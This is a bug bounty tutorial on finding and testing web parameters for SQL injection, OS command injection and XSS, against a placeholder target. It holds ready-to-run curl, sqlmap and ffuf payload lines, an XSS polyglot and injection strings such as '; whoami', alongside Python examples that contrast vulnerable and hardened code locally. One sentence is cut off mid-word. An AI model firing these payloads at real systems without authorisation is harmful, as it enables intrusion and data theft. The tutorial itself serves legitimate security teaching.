
Introduction:
In the dynamic world of bug bounty hunting, success often hinges on a hunter’s ability to meticulously manipulate every aspect of a web request. The core principle that “every bug has its parameters, every parameter has its bugs” underscores a fundamental truth: parameters are the primary attack surface in modern web applications. This article deconstructs the methodology behind identifying and exploiting parameter-based vulnerabilities, transforming standard testing into a profitable pursuit.
Learning Objectives:
- Master the systematic process for identifying and testing all parameter types within a target application.
- Learn advanced exploitation techniques for common parameter-based vulnerabilities like SQLi, XSS, and SSRF.
- Develop a professional workflow for vulnerability validation and report writing to ensure bounty approval.
You Should Know:
1. Enumerating the Attack Surface: Finding Every Parameter
The first step is discovering all possible inputs. This goes beyond visible form fields to include URL parameters, POST data, headers, and JSON/XML bodies.
Verified Commands & Techniques:
1. Using curl to fetch a page and list the form field names it contains (the `+` is needed so grep prints the whole name rather than its first character)
curl -s "https://target.com/page?search=term&user_id=45" | grep -oP 'name="\K[^"]+'
2. Intercepting and modifying requests with Burp Suite Proxy
Configure the browser to use Burp (127.0.0.1:8080), capture the request, right-click -> "Send to Repeater"
3. Using ffuf to brute-force hidden POST parameters (`-fr "error"` filters out responses whose body matches that regex, so only parameters that change the response remain)
ffuf -w /usr/share/wordlists/parameter-names.txt -u "https://target.com/endpoint" -X POST -d "FUZZ=test" -H "Content-Type: application/x-www-form-urlencoded" -fr "error"
4. Using Arjun for parameter discovery against an authenticated endpoint
python3 arjun.py -u https://target.com/endpoint --headers "Authorization: Bearer token"
5. Pulling historical URLs with waybackurls (gau is used the same way), keeping only those with a query string, and appending a marker to every parameter value with qsreplace
echo "target.com" | waybackurls | grep "?" | qsreplace -a "FUZZ"
Step-by-step guide: Start by manually browsing the application with your proxy active and note every parameter in every request, including headers and JSON/XML body fields, not just the visible form inputs. Then run `ffuf` or `Arjun` with large wordlists to discover parameters the application accepts but never links to. Finally, pipe historical URLs through `qsreplace -a` to append a payload marker to every parameter value, so each URL can be tested in one batch.
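The enumeration step above, as an added example that is not code from the original article or from any of the tools it names: it harvests parameter names from form controls and from query strings embedded in href/src/action attributes (which manual browsing often misses), merges them with names taken from historical URLs, and reproduces what `qsreplace -a FUZZ` does to a URL. The response body and URL list are constructed samples so the script runs offline; in practice you would feed it a `curl -s` body and `waybackurls` output.

```python
"""Collect candidate parameter names from an HTML response and a list of
historical URLs, then tag every value with a marker for batch testing.

Added example for this article, not code from the original page or from any
of the tools it names. The response body and URL list below are constructed
samples so the script runs offline.
"""
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urlencode, urlparse, urlunparse


def query_param_names(url):
    """Names of every parameter in the URL's query string (blank values kept)."""
    return {k for k, _ in parse_qsl(urlparse(url).query, keep_blank_values=True)}


class ParamCollector(HTMLParser):
    """Harvest names from form controls and from query strings embedded in
    href/src/action attributes, which visible browsing often misses."""

    def __init__(self):
        super().__init__()
        self.params = set()

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # valueless attributes map to None and are skipped
        if tag in ("input", "select", "textarea", "button") and a.get("name"):
            self.params.add(a["name"])
        for attr in ("href", "src", "action"):
            if a.get(attr):
                self.params |= query_param_names(a[attr])


def params_from_html(body):
    collector = ParamCollector()
    collector.feed(body)
    return collector.params


def enumerate_params(body, urls):
    """Sorted, de-duplicated parameter names from the page plus historical URLs."""
    names = set(params_from_html(body))
    for url in urls:
        names |= query_param_names(url)
    return sorted(names)


def mark_params(url, marker="FUZZ"):
    """Append `marker` to every query value, the same thing `qsreplace -a FUZZ`
    does, so one request per URL exercises every parameter at once."""
    u = urlparse(url)
    pairs = [(k, v + marker) for k, v in parse_qsl(u.query, keep_blank_values=True)]
    return urlunparse(u._replace(query=urlencode(pairs)))


# Constructed sample data (not captured from any real target).
SAMPLE_BODY = """
<form action="/search?debug=0" method="get">
  <input name="q"><select name="sort"><option>1</option></select>
  <textarea name="notes"></textarea>
</form>
<a href="/user?id=45&view=full">profile</a>
<img src="/img?size=small">
"""
SAMPLE_URLS = [
    "https://target.com/page?search=term&user_id=45",
    "https://target.com/api/item?id=7&format=json",
]

if __name__ == "__main__":
    for name in enumerate_params(SAMPLE_BODY, SAMPLE_URLS):
        print(name)
    for url in SAMPLE_URLS:
        print(mark_params(url))
```

One caveat worth knowing when parsing real pages this way: `HTMLParser` decodes entity references in attribute values, so a query string containing a legacy entity name without a semicolon (for example `&copy=1` or `&not=1`) is mangled before it reaches `parse_qsl`; pull such URLs from the raw body with a regex instead.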
2. Testing for Server-Side Vulnerabilities: SQL Injection & Command Execution
Parameters that interact with databases or system shells are high-value targets for SQL Injection (SQLi) and OS Command Injection.
Verified Commands & Code Snippets:
1. Basic SQLi probing with a single quote and a logical operator (grep needs `-E` for the alternation to work, and spaces inside a URL must be percent-encoded or most servers reject the request)
curl -s -g "https://target.com/user?id=1'" | grep -iE "error|sql|exception"
curl -s -g "https://target.com/user?id=1%20OR%201=1--"
2. Automated SQLi detection with sqlmap
sqlmap -u "https://target.com/user?id=1" --batch --level=3 --risk=2 --dbs
3. Time-based blind SQLi payload for MySQL (print the total request time and compare it with a baseline request that has no payload)
curl -s -g -o /dev/null -w "%{time_total}\n" "https://target.com/user?id=1'%20AND%20SLEEP(5)--%20-"
4. Testing for OS command injection in IP/ping-style parameters (`--data-urlencode` encodes the value so `;`, `|` and spaces reach the application intact)
curl -s -X POST "https://target.com/status" --data-urlencode "ip=127.0.0.1; whoami"
curl -s -X POST "https://target.com/status" --data-urlencode "ip=127.0.0.1 || id"
5. Union-based SQLi to extract data (adjust the number of columns until the query stops erroring)
curl -s -g "https://target.com/page?id=1'%20UNION%20SELECT%201,2,3,version(),5--%20-"
Step-by-step guide: After identifying a parameter, first test for syntax errors with `'` or `"`. If a database error is reflected, proceed with logical tests such as `OR 1=1` and compare the response with the baseline. For time-based blind SQLi, use `SLEEP()` and compare response times against an unmodified request; repeat the measurement, since a single slow response can be network noise. Always escalate promising leads with `sqlmap` for full database enumeration. For command injection, chain commands with `;`, `|`, `||` or `&&`.
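Why the probes in this section work, as an added example that is not code from the original article: a lookup built by string concatenation beside its parameterised form, and a shell-based "ping" beside an argv-based one. It uses an in-memory SQLite database (so `SLEEP()` is unavailable, but the quote, `OR 1=1` and `UNION` probes behave exactly as against MySQL) and `echo` in place of `ping`, so nothing touches a real target; the table rows are constructed sample data.

```python
"""A vulnerable lookup beside its hardened form, for both SQL injection and
OS command injection.

Added example for this article, not code from the original page. It uses an
in-memory SQLite database and `echo` in place of `ping`, so nothing here
touches a real target; the table rows are constructed sample data.
"""
import ipaddress
import sqlite3
import subprocess


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, name TEXT, email TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        (1, "alice", "alice@example.com"),   # constructed rows
        (2, "bob", "bob@example.com"),
        (3, "carol", "carol@example.com"),
    ])
    return con


def lookup_vulnerable(con, user_id):
    # String concatenation: whatever arrives in ?id= becomes SQL text, so
    # "1 OR 1=1--" widens the WHERE clause and "0 UNION SELECT ..." adds rows.
    sql = "SELECT id, name, email FROM users WHERE id = " + user_id
    return con.execute(sql).fetchall()


def probe_quote(con, user_id):
    # The article's first probe: does a stray quote produce a database error?
    try:
        lookup_vulnerable(con, user_id)
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)


def lookup_hardened(con, user_id):
    # Validate the type, then bind the value: the driver sends it separately
    # from the statement, so quotes, OR and UNION are just data.
    if not user_id.isdigit():
        raise ValueError("id must be an integer")
    return con.execute(
        "SELECT id, name, email FROM users WHERE id = ?", (int(user_id),)
    ).fetchall()


def ping_vulnerable(ip):
    # shell=True hands the whole string to /bin/sh, so ';' '|' '||' '&&'
    # chain a second command. `echo` stands in for `ping -c 1`.
    out = subprocess.run("echo " + ip, shell=True, capture_output=True, text=True)
    return out.stdout.splitlines()


def ping_hardened(ip):
    # Validate the value as an IP address and pass it as one argv element
    # with no shell, so metacharacters are never interpreted.
    ipaddress.ip_address(ip)  # raises ValueError on anything that is not an IP
    out = subprocess.run(["echo", ip], capture_output=True, text=True)
    return out.stdout.splitlines()


def rejects(fn, *args):
    """True if the hardened function refuses the input with ValueError."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print(probe_quote(db, "1'"))
    print(lookup_vulnerable(db, "1 OR 1=1--"))
    print(lookup_vulnerable(db, "0 UNION SELECT 1,2,sqlite_version()-- -"))
    print(ping_vulnerable("127.0.0.1; echo INJECTED"))
    print(rejects(lookup_hardened, db, "1 OR 1=1--"), rejects(ping_hardened, "127.0.0.1; echo INJECTED"))
```

The `UNION` row shows why the article says to adjust the column count: the injected `SELECT` must return exactly as many columns as the original (three here) or the database errors instead of leaking `version()`.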
3. Exploiting Client-Side Flaws: Cross-Site Scripting (XSS)
XSS remains a top vulnerability where malicious scripts are injected through parameters and executed in a user’s browser.
Verified Commands & Code Snippets:
1. Basic XSS probe to test for reflection (grep for the exact payload; matching just "script" would also hit the page's own script tags)
curl -s -g "https://target.com/search?q=%3Cscript%3Ealert(1)%3C/script%3E" | grep -i "<script>alert(1)</script>"
2. Using a reflected XSS polyglot payload. It mixes backticks, both quote styles and backslashes, so save it to polyglot.txt rather than fighting shell quoting and let curl read and encode it. curl percent-encodes the whole file, so the literal %0D%0A sequences arrive encoded a second time; paste the raw payload into Burp Repeater if that part matters. Contents of polyglot.txt:
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
curl -s -G --data-urlencode "q@polyglot.txt" "https://target.com/search"
3. Breaking out of an HTML attribute with "><img src=x onerror=alert(1)> (percent-encoded below). curl only shows whether the payload is reflected; DOM-based XSS, where the sink is client-side JavaScript, can only be confirmed in a browser.
curl -s -g "https://target.com/search?q=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"
4. Testing for stored XSS in comment/contact forms, then fetching the page that renders comments to check whether the payload came back unencoded
curl -s -X POST "https://target.com/comment" -d "name=test" --data-urlencode "comment=<svg onload=alert(document.domain)>"
5. Percent-encoding the entire payload (<script>alert(1)</script>). The server decodes this before application code or most WAF rules see it, so it only defeats filters that match the raw query string; tag and case variation, as in the polyglot above, does more against real filters.
curl -s -g "https://target.com/search?q=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"
Step-by-step guide: Identify parameters that are reflected in the HTTP response without proper encoding. Start with simple `
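The reflection check this section describes, as an added example that is not code from the original article: send a unique canary wrapped around the characters XSS depends on, then inspect the response to see which of them came back raw, which were entity-encoded, and in what context (HTML text, attribute, or script) the reflection landed. Nothing is sent here; the three response bodies are constructed samples standing in for what `curl -s` would return, and `probe_url` builds the request you would actually issue against the article's `search?q=` endpoint.

```python
"""Where does a parameter come back, and which characters survive?

Added example for this article, not code from the original page. Sends
nothing: the response bodies below are constructed samples standing in for
what `curl -s` would return.
"""
import html
import re
from urllib.parse import quote

CANARY = "zq7x"          # unlikely token so we only match our own reflection
PROBE_CHARS = "<>\"'"    # the characters XSS payloads depend on


def build_probe(canary=CANARY, chars=PROBE_CHARS):
    return canary + chars + canary


def probe_url(base, param, canary=CANARY, chars=PROBE_CHARS):
    """Percent-encoded probe URL, ready for `curl -s -g`."""
    return f"{base}?{param}={quote(build_probe(canary, chars), safe='')}"


def classify_context(body, pos):
    """Coarse reflection context at offset `pos`: script, attribute or html text."""
    head = body[:pos].lower()
    if head.rfind("<script") > head.rfind("</script"):
        return "script"
    if head.rfind("<") > head.rfind(">"):
        return "attribute"
    return "html"


def analyze_reflection(body, canary=CANARY, chars=PROBE_CHARS):
    """For every reflection of the probe, report which characters came back
    raw, which were entity-encoded, which were stripped, and the context."""
    findings = []
    pattern = re.compile(re.escape(canary) + r"(.*?)" + re.escape(canary), re.S)
    for m in pattern.finditer(body):
        between = m.group(1)
        raw = "".join(c for c in chars if c in between)
        escaped = "".join(c for c in chars if c not in raw and html.escape(c) in between)
        stripped = "".join(c for c in chars if c not in raw and c not in escaped)
        findings.append({
            "raw": raw,
            "escaped": escaped,
            "stripped": stripped,
            "context": classify_context(body, m.start()),
        })
    return findings


def likely_xss(finding):
    """Heuristic: the raw characters needed to inject in each context."""
    raw, ctx = finding["raw"], finding["context"]
    if ctx == "html":
        return "<" in raw                                # open a new tag
    if ctx == "attribute":
        return '"' in raw or "'" in raw                  # close the attribute
    return "'" in raw or '"' in raw or "<" in raw        # break the JS string or </script>


# Constructed responses to the probe zq7x<>"'zq7x (not from a real target).
SAFE_BODY = "<p>Results for: zq7x&lt;&gt;&quot;&#x27;zq7x</p>"
TEXT_BODY = "<p>Results for: zq7x<>\"'zq7x</p>"
ATTR_BODY = "<input type=\"text\" value=\"zq7x&lt;&gt;\"'zq7x\">"

if __name__ == "__main__":
    print(probe_url("https://target.com/search", "q"))
    for body in (SAFE_BODY, TEXT_BODY, ATTR_BODY):
        for f in analyze_reflection(body):
            print(f, "-> likely XSS" if likely_xss(f) else "-> encoded/safe")
```

The attribute case is the one manual testers most often miss: `<` and `>` are encoded, which looks safe at a glance, yet the raw `"` is enough to close `value="..."` and add an event handler, which is exactly the `"><img src=x onerror=alert(1)>` breakout from the list above.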